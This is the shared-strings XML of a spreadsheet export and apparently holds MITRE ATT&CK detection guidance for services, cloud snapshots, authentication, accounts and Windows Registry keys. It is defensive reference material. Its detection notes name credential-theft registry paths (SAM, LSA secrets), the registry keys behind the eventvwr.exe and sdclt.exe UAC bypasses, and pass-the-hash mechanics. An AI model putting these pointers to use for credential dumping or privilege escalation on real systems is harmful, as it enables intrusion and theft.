    <t>Monitor contextual data about a service/daemon, which may include information such as name, service executable, start type that that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>Monitor the status of services involved in system recovery.</t>
  </si>
  <si>
    <t>Monitor for changes made to services for unexpected modifications to names, descriptions, and/or start types</t>
  </si>
  <si>
    <t>Monitor for contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.</t>
  </si>
  <si>
    <t>Alterations to the service binary path or the service startup type changed to disabled may be suspicious.</t>
  </si>
  <si>
    <t>Hashing of binaries and service executables could be used to detect replacement against historical data.</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline.</t>
  </si>
  <si>
    <t>Monitor for changes made to launch agents to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor services for changes made to Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity.</t>
  </si>
  <si>
    <t>Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.</t>
  </si>
  <si>
    <t>Monitor for changes made to Windows services to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API)
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;sourceSnapshot&lt;/code&gt; parameter pointed to &lt;code&gt;global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a snapshot (ex: AWS delete-snapshot)</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the deletion of multiple snapshots within a short period of time. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor cloud logs for API calls and other potentially unusual activity related to snapshot enumeration. Discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</t>
  </si>
  <si>
    <t>Periodically baseline snapshots to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the mounting of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs.</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</t>
  </si>
  <si>
    <t>Monitor for an attempts by a user to gain access to a network or computing resource, often by providing credentials via remote terminal services, that do not have a corresponding entry in a command history file.</t>
  </si>
  <si>
    <t>It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Correlate other security systems with login information</t>
  </si>
  <si>
    <t>It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. (ex: Windows EID 4625 or 5379)</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by the use of domain authentication services, such as the System Security Services Daemon (sssd) on Linux</t>
  </si>
  <si>
    <t>Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>Monitor for account authentications in which MFA credentials are not provided by the user account to the authenticating entity.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for account authentications in which MFA credentials are not provided by the user account to the authenticating entity. </t>
  </si>
  <si>
    <t>Monitor user account logs for suspicious events: unusual login attempt source location, mismatch in location of login attempt and smart device receiving 2FA/MFA request prompts, and high volume of repeated login attempts, all of which may indicate user's primary credentials have been compromised minus 2FA/MFA mechanism.</t>
  </si>
  <si>
    <t>Monitoring for Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</t>
  </si>
  <si>
    <t>Monitor for user authentication attempts. From a classic Pass-The-Hash perspective, this technique uses a hash through the NTLMv1 / NTLMv2 protocol to authenticate against a compromised endpoint. This technique does not touch Kerberos. Therefore, NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious. From an Over-Pass-The-Hash perspective, an adversary wants to exchange the hash for a Kerberos authentication ticket (TGT). One way to do this is by creating a sacrificial logon session with dummy credentials (LogonType 9) and then inject the hash into that session which triggers the Kerberos authentication process.</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.</t>
  </si>
  <si>
    <t>Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging.(Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>Monitor for user authentication attempts, when requesting access tokens to services, that failed because of Conditional Access Policies (CAP). Some SAML tokens features, such as the location of a user, may not be as easy to claim.</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may search compromised systems to find and obtain insecurely stored credentials.</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for an attempt by a user that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. </t>
  </si>
  <si>
    <t>Monitor for newly constructed user accounts through the collection of usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Monitor for newly constructed user accounts through account audits to detect suspicious accounts that may have been created by an adversary. Collect data on account creation within a network or Windows Event ID 4720 (for when a user account is created on a Windows system and domain controller).</t>
  </si>
  <si>
    <t>Monitor for newly constructed user accounts, such as userIDs under 500 on macOS, that may mask the presence of user accounts they create or modify.</t>
  </si>
  <si>
    <t>Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletions of user accounts. Windows event logs may designate activity associated with an adversary's attempt to remove an account (ex: Event ID 4726 - A user account was deleted)._x000D_
_x000D_
Alerting on these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Monitor for contextual data about an account, which may include a username, user ID, environmental data, etc. that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.</t>
  </si>
  <si>
    <t>Monitor for contextual data about an account, which may include a username, user ID, environmental data that may mask the presence of user accounts they create or modify. On macOS, identify users with an userID under 500 and the &lt;code&gt;Hide500Users&lt;/code&gt; key value in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file set to &lt;code&gt;TRUE&lt;/code&gt;.(Citation: Cybereason OSX Pirrit)</t>
  </si>
  <si>
    <t>Monitor for contextual data about an account, which may include a username, user ID, environmental data that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for contextual data about an account that may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.</t>
  </si>
  <si>
    <t>Monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes</t>
  </si>
  <si>
    <t>Monitor for changes made to user accounts for unexpected modification of properties, such as passwords or status (enabled/disabled). Windows event logs may designate activity associated with an adversary's attempt to remove access to an account:_x000D_
Event ID 4723 - An attempt was made to change an account's password_x000D_
Event ID 4724 - An attempt was made to reset an account's password_x000D_
Event ID 4725 - A user account was disabled_x000D_
_x000D_
Alerting on these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670. Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ or that include additional flags such as changing a password without knowledge of the old password._x000D_
_x000D_
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected changes to cloud user accounts, such as Azure Activity Logs highlighting malicious Service Principal and Application modifications. 
Monitor for the use of API and CLI commands that add access keys to accounts, such as &lt;code&gt;CreateAccessKey&lt;/code&gt; in AWS or &lt;code&gt;service-accounts keys create&lt;/code&gt; in GCP. Also monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account. </t>
  </si>
  <si>
    <t>Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. Monitor for updates to IAM policies and roles attached to user accounts.</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor user accounts for new and suspicious device associations, such as those originating from unusual sources, occurring at unusual times, or following a suspicious login.(Citation: Microsoft DEV-0537) </t>
  </si>
  <si>
    <t>Monitor for the enrollment of devices and user accounts with alternative security settings that do not require MFA credentials for successful logon.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the enrollment of devices and user accounts with alternative security settings that do not require MFA credentials for successful logon. </t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>Monitor for the unexpected creation or presence of cloud block storage volumes . To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a cloud volume (ex: AWS delete-volume)</t>
  </si>
  <si>
    <t>Monitor for the unexpected deletion or absence of cloud block storage volumes . To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor cloud logs for API calls and other potentially unusual activity related to block object storage enumeration. Discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</t>
  </si>
  <si>
    <t>Periodically baseline cloud block storage volumes to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>Monitor cluster-level (Kubernetes) data and events associated with changing containers' volume configurations.</t>
  </si>
  <si>
    <t>Monitor for the unexpected changes to cloud block storage volumes . To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor for newly constructed WMI Objects that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI &lt;code&gt;EventFilter&lt;/code&gt;, &lt;code&gt;EventConsumer&lt;/code&gt;, and &lt;code&gt;FilterToConsumerBinding&lt;/code&gt; events. Event ID 5861 is logged on Windows 10 systems when new &lt;code&gt;EventFilterToConsumerBinding&lt;/code&gt; events are created.(Citation: Elastic - Hunting for Persistence Part 1)</t>
  </si>
  <si>
    <t>Monitor for creation of access tokens using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Monitor the use of application access tokens to interact with resources or services that do not fit the organization baseline. For example, an application, that is not meant to read emails, is now accessing users’ mail boxes and, potentially, exfiltrating sensitive data.</t>
  </si>
  <si>
    <t>Monitor for the use of Access Tokens to access services such as Email that were created using SAML tokens which do not have corresponding 1202 events in the domain.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Monitor for the use of access tokens to access services such as email that were created using SAML tokens which do not have corresponding 1202 events (i.e. “The Federation Service validated a new credential”) in the domain.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202) that may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.</t>
  </si>
  <si>
    <t>Monitor for the usage of unexpected or unusual cookies to access resources and services. Forged web cookies may be associated with unknown accounts and could be the result of compromised secrets such as passwords or [Private Keys](https://attack.mitre.org/techniques/T1552/004).</t>
  </si>
  <si>
    <t>Monitor for unexpected windows registry key being accessed that may search the Registry on compromised systems for insecurely stored credentials.</t>
  </si>
  <si>
    <t>Monitor for the LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt; being accessed</t>
  </si>
  <si>
    <t>Monitor for the SAM registry key being accessed that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.</t>
  </si>
  <si>
    <t>Monitor for unexpected process interactions with the Windows Registry (i.e. reads) that may be related to gathering information.</t>
  </si>
  <si>
    <t>Monitor for the SAM registry key dump being created to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Monitor for attempts to access information stored in the Registry about certificates and their associated private keys. For example, user certificates are commonly stored under `HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates`.(Citation: SpecterOps Certified Pre Owned)(Citation: O365 Blog Azure AD Device IDs)</t>
  </si>
  <si>
    <t>Monitor for access to windows registry keys that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>Monitor for unexpected windows registry key being accessed that may search compromised systems to find and obtain insecurely stored credentials.</t>
  </si>
  <si>
    <t>Monitor Registry key additions to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)</t>
  </si>
  <si>
    <t>Monitor for additions of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry.</t>
  </si>
  <si>
    <t>Monitor for newly constructed windows registry keys that may use scripts automatically executed at boot or logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.</t>
  </si>
  <si>
    <t>Monitor for newly constructed windows registry keys that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor the addition of the MiniNT registry key in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control, which may disable Event Viewer.(Citation: def_ev_win_event_logging)</t>
  </si>
  <si>
    <t>Monitoring the creation of (sub)keys within the Windows Registry may reveal malicious root certificate installation. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Monitor for the creation/modification to Registry keys associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed registry keys or values to aid in persistence and execution. </t>
  </si>
  <si>
    <t>Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)</t>
  </si>
  <si>
    <t>Collect events related to Registry key creation for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)</t>
  </si>
  <si>
    <t>Monitor for the creation of the Office Test Registry key. Collect events related to Registry key creation for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>Monitor for newly created windows registry keys that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.</t>
  </si>
  <si>
    <t>Monitor Registry creation for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a &lt;code&gt;\*&lt;/code&gt; in front of the "Startup" value name: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\["\*Startup"="{Path}"]&lt;/code&gt; or by adding a key to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal&lt;/code&gt;.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)</t>
  </si>
  <si>
    <t>Monitor for newly constructed registry keys upon creation of new task. Deletion of values/keys in the registry may further indicate malicious activity.</t>
  </si>
  <si>
    <t>Monitoring the creation of (sub)keys within the Windows Registry may reveal malicious attempts to modify trust settings, such as the installation of root certificates. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Monitor for new constructed windows registry keys that may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor windows registry keys that may be deleted or alter generated artifacts associated with persistence on a host system. </t>
  </si>
  <si>
    <t>Monitor for deletion of Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Microsoft\AMSI\Providers.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of windows registry keys that that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>Monitor windows registry keys that may be deleted or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion of windows registry keys to hide configuration information, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. </t>
  </si>
  <si>
    <t>There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor Registry key modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of "0" indicates LLMNR is disabled.</t>
  </si>
  <si>
    <t>Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>Monitor for changes to windows registry keys and/or values that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Monitor for modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry.</t>
  </si>
  <si>
    <t>Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER variable, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools.</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.</t>
  </si>
  <si>
    <t>Monitor for changes to Registry keys (ex: &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;) and associated values that may be malicious attempts to conceal adversary network connection history.</t>
  </si>
  <si>
    <t>Monitor for changes made to windows registry keys or values that may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>Consider monitoring for modifications made to Registry keys associated with code signing policies, such as &lt;code&gt;HKCU\Software\Policies\Microsoft\Windows NT\Driver Signing&lt;/code&gt;. Modifications to the code signing policy of a system are likely to be rare.</t>
  </si>
  <si>
    <t>There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.</t>
  </si>
  <si>
    <t>Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
